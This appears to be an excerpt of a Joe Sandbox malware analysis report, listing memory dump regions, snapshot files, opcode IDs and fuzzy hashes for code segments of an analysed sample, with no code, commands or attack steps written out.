                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: 65632e723c189e4064236202250ffe9fae7105dc8b93c79f62f27da13805b71f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8771D432A083658BD7268E3CC48039EBBE2AFC5714F19892FE49497791D335DC46CB92
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: DB
                                                                                                                                                                                                                                                                          • API String ID: 0-3908451873
                                                                                                                                                                                                                                                                          • Opcode ID: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                          • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LB
                                                                                                                                                                                                                                                                          • API String ID: 0-539997225
                                                                                                                                                                                                                                                                          • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                          • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                          • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
• Instruction ID: f9926f97e3c778b3f1d9c1f8e24e0c92a3c0a75791df361c75dae871acd1ab51
• Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
• Instruction Fuzzy Hash: 51512733B499A14BE72D893C4C723A6AA834BE6134B2DD77BD8B1CB3E5D56588468340

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
• Opcode ID: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
• Instruction ID: e53377bff7785aab9c860189b37f281a10190bc6254a0cb92638023f3cbf7aaf
• Opcode Fuzzy Hash: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
• Instruction Fuzzy Hash: DE5136B19083808FD724DF2984916AFBBE6AFD1304F05892EE5D547351D739D909CF92

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: w
• API String ID: 0-2991200456
• Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
• Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
• Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
• Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: w
• API String ID: 0-2991200456
• Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
• Instruction ID: df1b4b5bbd16396a99fa834d7ad3d71079d0bb8adfbdcfcaeee253d25b5b0675
• Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
• Instruction Fuzzy Hash: 624126BAE116258FD704DFA4CC845ABBB72FB84315B1AC1A8C8847B319D77869078BD0

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ihgf
• API String ID: 0-2948842496
• Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
• Instruction ID: 119f3cb10ec40df81934660e4df2343e58433ea6d49c8757dafbc4cdbe146c8c
• Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
• Instruction Fuzzy Hash: 1B31E638704300ABD7909F2E9C81B3BB7A5EB8672CF34453DE58593290D761E8518A56

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
• Opcode ID: 53ff61613a6750327358e77a3d2a2db8208b12b742968293ea1bf310bf76e569
• Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
• Opcode Fuzzy Hash: 53ff61613a6750327358e77a3d2a2db8208b12b742968293ea1bf310bf76e569
• Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ihgf
• API String ID: 0-2948842496
• Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
• Instruction ID: 64227dee920a6a19049b1cc715272b82efc64a6e3f3c5d75cb337066e19d8a55
• Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
• Instruction Fuzzy Hash: BD31E43CB04301EBE6919F289C81B3BF7A5EB8A718F34453DE68497390DB30E850CA56

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: dB
• API String ID: 0-2104629891
• Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
• Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
• Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
• Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C

Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
• Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
• Opcode Fuzzy Hash: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                          • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction ID: 8f991530f7654b7407438beebf5f349a429091c2cbb7848180569c028d16a059
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B552E4315083458FCB14CF19C0906AABFE1FF8A318F1986AEF8995B341D775E989CB81
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                          • Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                          • Instruction ID: af85ab077d7c3c700c3b2808528cf372c4439bdc5a6cc90dcaa067268ddbbce5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD52B2B0A08B848FEF35CB24C4843A7BFE5AB81314F15492FD5EA06BC6D379A585CB15
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                          • Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          • Opcode ID: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                                          • Instruction ID: a0412a8795515e55d8c51c19711d20e3b6761cbacb91afc8e1cf8c2abf89b607
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE17A711083418FDB21CF29C880A2BFFE5EF99204F44892EE5D987751E375E949CB56
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                          • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ac1a7de888730ed19efd1b3a810a8cf5ee67ec92a46044f1e54f4af5458cd7db
                                                                                                                                                                                                                                                                          • Instruction ID: f9929a72ce68a40c3f81f5f1acad1d241ce5af9a0f8176ac8c595b8a2b44423d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac1a7de888730ed19efd1b3a810a8cf5ee67ec92a46044f1e54f4af5458cd7db
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDD15535B05255CFDB14CFB8E8816AEBBB2AF1A300F58417DE551A7392CB388E05CB59
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                                                                                                                                                                                                                                          • Instruction ID: c7afa36b394fec79d3864c076b52a9d2828a05187d2106694a5d2b7072183649
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A11571205701CFD329CF28C4A19A777E2FF8A310719869DD4A68B3A5EB38AC41CB54
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                                          • Instruction ID: 7a187c3c3f09ae67765af2c89105e198e05b5bd2f5178039556cf2bc03a2e881
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A12771201B41CFD729CF29C861A6377F2EF963147198A9DD4A68F7A5EB38E801CB50
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                          • Instruction ID: 7df63c40a7204dc4afa58f15cbcbae2765b2c4f4d29a5674b1018b029ffe7601
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4C1F2B16083808BD718DF25C850AAFBBE6EFD2314F14492DE4D68B391DB79C50ACB56
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
